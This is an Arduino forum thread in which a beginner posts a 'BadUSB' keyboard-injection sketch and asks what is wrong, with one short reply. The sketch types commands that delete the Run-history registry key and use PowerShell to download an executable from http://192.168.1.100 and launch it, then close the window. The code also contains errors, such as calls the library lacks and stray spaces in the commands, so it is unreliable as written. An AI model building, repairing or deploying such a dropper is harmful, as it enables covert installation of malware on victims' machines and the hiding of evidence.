查看: 220|回复: 2

[未解决] 求各位大佬帮帮新人

[复制链接]
  • TA的每日心情
    无聊
    2019-10-20 11:01
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2019-10-20 11:00 | 显示全部楼层 |阅读模式
    void setup() {
      // put your setup code here, to run once:
      #include<Keyboard.h>
      delay(5000);
      Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      delay(100);
      Keyboard.print("cmd.exe/T:01/K mode CON:COLS=16 LINES=1");
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
        delay(300);
        Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //利用注册表清除开始--运行的记录
        Keyboard.set_key1(KEY_ENTER);
        Keyboard.send_now();
        Keyboard.println("powershell (new- object System.Net.WebClient).DownloadFile('http://192.168.1.100 /a1.exe','D:\\1.exe')"); //下载远程的payload
        Keyboard.set_key1(KEY_ENTER);
        Keyboard.send_now();
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.send_now();
        delay(3000);
        Keyboard.println("d:\\1.exe");
        Keyboard.set_key1(KEY_ENTER);
        delay(300);
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.set_modifier(MODIFIERKEY_ALT);
        Keyboard.set_key1(KEY_SPACE);
        Keyboard.set_key2(KEY_C);
        Keyboard.send_now();
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.set_key2(0);
        Keyboard.send_now();

    }

    void loop() {
      // put your main code here, to run repeatedly:

    }


    这里面有什么是错的吗?

    有哪里是错的吗?

    有哪里是错的吗?
  • TA的每日心情
    擦汗
    2019-11-9 11:33
  • 签到天数: 918 天

    [LV.10]以坛为家III

    发表于 2019-10-20 13:40 | 显示全部楼层
    这个类没有这个成员函数。
  • TA的每日心情
    无聊
    2019-10-20 11:01
  • 签到天数: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2019-10-20 19:31 来自手机 | 显示全部楼层
    seesea 发表于 2019-10-20 13:40
    这个类没有这个成员函数。

    那怎么弄啊
    您需要登录后才可以回帖 登录 | 立即注册  

    本版积分规则

    热门推荐

    【原创】全球最小口袋3D打印机mini one直播教程贴
    【原创】全球最小口袋3D打
    最近闲得蛋疼,没事搞个掌上3D打印机,先放效果图吧。 搞了半天,终于能正常打印,
    程序设计问题求大虾们帮帮忙
    程序设计问题求大虾们帮帮
    大家好,我是一个萌新想设计一个程序,现在遇到困难了。当运行按下按钮,电机会向end
    请问 3块 MCP 4725 ,能否同时接在一起使用?
    请问 3块 MCP 4725 ,能否
    买来时,ADDR是全开路的,使用代码中的所有地址,均无法使用。 // For Adafruit M
    打砖块游戏
    打砖块游戏
    **** 本内容被作者隐藏 ****
    OLED 128*64自制可达10000000个选项的菜单(已更新)
    OLED 128*64自制可达10000
    OLED 128*64自制可达10000000个选项的菜单 温馨提示: 建议占个楼再食用本帖子
    Copyright   ©2015-2016  Arduino中文社区  Powered by©Discuz!   
    快速回复 返回顶部 返回列表